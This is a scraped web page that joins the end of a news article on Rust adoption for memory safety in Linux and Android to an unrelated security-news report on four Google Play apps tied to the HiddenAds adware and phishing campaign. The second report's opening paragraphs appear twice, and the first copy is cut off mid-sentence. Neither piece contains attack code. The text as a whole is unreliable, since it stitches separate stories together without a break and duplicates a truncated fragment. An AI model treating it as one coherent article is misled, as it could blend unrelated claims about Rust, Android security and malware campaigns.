Rust is not without its skeptics and detractors. The effort over the last two years to implement Rust in Linux has been controversial, partly because adding support for any other language inherently increases complexity, and partly because of debates about how, specifically, to go about making it all work. But proponents emphasize that Rust has the necessary elements—it doesn't cause performance loss, and it interoperates well with software written in other languages—and that it is crucial simply because it meets a dire need.

“It’s less that it’s the right choice and more that it’s ready,” Lorenc, a longtime open-source contributor and researcher, says. “There are no real alternatives right now, other than not doing anything, and that’s just not an option anymore. Continuing to use memory-unsafe code for another decade would be a massive problem for the tech industry, for national security, for everything.”

One of the biggest challenges of the transition to Rust, though, is precisely all the decades that developers have already spent writing vital code in memory-unsafe languages. Writing new software in Rust doesn't address that massive backlog. The Linux kernel implementation, for example, is starting on the periphery by supporting Rust-based drivers, the programs that coordinate between an operating system and hardware like a printer.

“When you’re doing operating systems, speed and performance is always top-of-mind, and the parts that you’re running in C++ or C are usually the parts that you just can’t run in Java or other memory-safe languages, because of performance,” Google's Kleidermacher says. “So to be able to run Rust and have the same performance but get the memory safety is really cool. But it’s a journey. You can’t just go and rewrite 50 million lines of code overnight, so we’re carefully picking security-critical components, and over time we’ll retrofit other things.”

In Android, Kleidermacher says a lot of encryption-key-management features are now written in Rust, as is the private internet communication feature DNS over HTTPS, a new version of the ultra-wideband chip stack, and the new Android Virtualization Framework used in Google's custom Tensor G2 chips. He adds that the Android team is increasingly converting connectivity stacks like those for Bluetooth and Wi-Fi to Rust because they are based on complex industry standards and tend to contain a lot of vulnerabilities. In short, the strategy is to start getting incremental security benefits from converting the most exposed or vital software components to Rust first and then working inward from there. 

“Yes, it’s a lot of work, it will be a lot of work, but the tech industry has how many trillions of dollars, plus how many talented programmers? We have the resources," says Josh Aas, executive director of the Internet Security Research Group, which runs the memory-safety initiative Prossimo as well as the free certificate authority Let's Encrypt. “Problems that are merely a lot of work are great."

As Rust makes the transition to mainstream adoption, the case for some type of solution to memory-safety issues seems to get made again and again every day. Just this week, a high-criticality vulnerability in the ubiquitous secure communication library OpenSSL could have been prevented if the mechanism were written in a memory-safe language. And unlike the notorious 2014 OpenSSL vulnerability Heartbleed, which lurked unnoticed for two years and exposed websites across the internet to data interception attacks, this new bug had been introduced into OpenSSL in the past few months, in spite of efforts to reduce memory-safety vulnerabilities.

“How many people right now are living the identity-theft nightmare because of a memory-safety bug? Or on a national security level, if we’re worried about cyberattacks on the United States, how much of that threat is on the back of memory-safety vulnerabilities?” Aas says. “From my point of view, the whole game now is just convincing people to put in the effort. Do we understand the threat well enough, and do we have the will.”

The Rise of Rust, the ‘Viral’ Secure Programming Language That’s Taking Over Tech

A set of four Android apps released by the same developer has been discovered directing victims to malicious websites as part of an adware and information-stealing campaign.
The apps, published by a developer named Mobile apps Group and currently available on the Play Store, have been collectively downloaded over one million times.
According to Malwarebytes, the websites are designed to generate

A set of four Android apps released by the same developer has been discovered directing victims to malicious websites as part of an adware and information-stealing campaign.

The apps, published by a developer named Mobile apps Group and currently available on the Play Store, have been collectively downloaded over one million times.

According to Malwarebytes, the websites are designed to generate revenues through pay-per-click ads, and worse, prompt users to install cleaner apps on their phones with the goal of deploying additional malware.

The list of apps is as follows -

*   Bluetooth App Sender (com.bluetooth.share.app) - 50,000+ downloads
*   Bluetooth Auto Connect (com.bluetooth.autoconnect.anybtdevices) - 1,000,000+ downloads
*   Driver: Bluetooth, Wi-Fi, USB (com.driver.finder.bluetooth.wifi.usb) - 10,000+ downloads
*   Mobile transfer: smart switch (com.mobile.faster.transfer.smart.switch) - 1,000+ downloads

It's no surprise that malicious apps have devised new ways to get past Google Play Store security protections. One of the more popular tactics adopted by threat actors is to introduce time-based delays to conceal their malicious behavior.

Malwarebytes' analysis found the apps to have an approximately four-day waiting period before opening the first phishing site in Chrome browser, and then proceed to launch more tabs every two hours.

The apps are part of a broader malware operation called HiddenAds, which has been active since at least June 2019 and has a track record of illicitly earning revenues by redirecting users to advertisements.

The findings also come as researchers from Guardio Labs disclosed details of a malvertising campaign dubbed Dormant Colors that leverages rogue Google Chrome and Microsoft Edge extensions to hijack user search queries to an actor-controlled domain.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#wifi